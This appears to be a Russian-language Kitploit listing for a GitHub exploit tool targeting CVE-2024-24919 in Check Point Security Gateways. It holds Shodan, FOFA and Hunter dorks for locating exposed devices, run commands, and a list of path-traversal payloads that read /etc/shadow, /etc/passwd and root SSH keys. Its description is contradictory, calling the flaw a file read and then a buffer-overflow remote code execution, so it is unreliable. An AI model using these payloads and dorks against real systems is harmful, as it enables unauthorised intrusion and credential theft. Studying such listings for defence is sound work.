Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/goatsecurity/cve-2024-24919
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubgoatsecurity/cve-2024-24919

CVE-2024-24919

CVE-2024-24919 exploit

Репозиторий
20112 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Инструмент эксплуатации RCE уязвимости в Check Point Security Gateway (CVE-2024-24919)

Обзор

Этот репозиторий содержит инструмент для эксплуатации уязвимости CVE-2024-24919 в Check Point Security Gateways. Инструмент представляет собой мульти-сканер, способный выявлять уязвимые устройства, и одноцелевой эксплойт, позволяющий получить полный контроль над поражённым устройством.

CVE-2024-24919 — это уязвимость высокой степени серьёзности, связанная с раскрытием информации, которая позволяет злоумышленнику удалённо читать произвольные файлы на Check Point Security Gateway. Данная уязвимость может быть использована для кражи конфиденциальной информации, такой как пароли и конфигурационные файлы.

Отказ от ответственности:

Этот инструмент предоставляется только в образовательных целях. Его не следует использовать для атак на уязвимые системы без явного согласия владельца. Авторы этого инструмента не несут ответственности за любой ущерб, возникший в результате его использования.

Как это работает

Эксплойт работает путём отправки специально сформированного HTTP-запроса уязвимому устройству. Запрос вызывает переполнение буфера в прошивке устройства, что позволяет злоумышленнику выполнить произвольный код. Затем эксплойт может быть использован для получения полного контроля над устройством.

Требования

  • Python 3
  • colorama
  • requests

Установка

root@kitploit:~
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt

Использование

Вы можете сканировать как одну цель, так и несколько!

root@kitploit:~
python cve-2024-24919.py

**Дорки **

root@kitploit:~
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"

# Shodan
SHODAN: http.title="Check Point SSL Network Extender"

# Fofa Query
FOFA: title="Check Point SSL Network Extender"

Скриншот инструмента

ss

$ Пути инструмента : ```

root@kitploit:~
    'aCSHELL/../../../../../../../../../../../etc/passwd',
    
    'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
    
    'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
    
    'aCSHELL/../../../../../../../../../../../var/log/syslog',
    
    'aCSHELL/../../../../../../../../../../../var/log/auth.log',
    
    #'aCSHELL/../../../../../../../../../../../var/log/messages',
    
    'aCSHELL/../../../../../../../../../../../etc/group',
    
    'aCSHELL/../../../../../../../../../../../etc/shadow',
    
    'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
    
    'aCSHELL/../../../../../../../../../../../etc/hostname',
    
    'aCSHELL/../../../../../../../../../../../etc/hosts',
    
    'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```
Скачать инструмент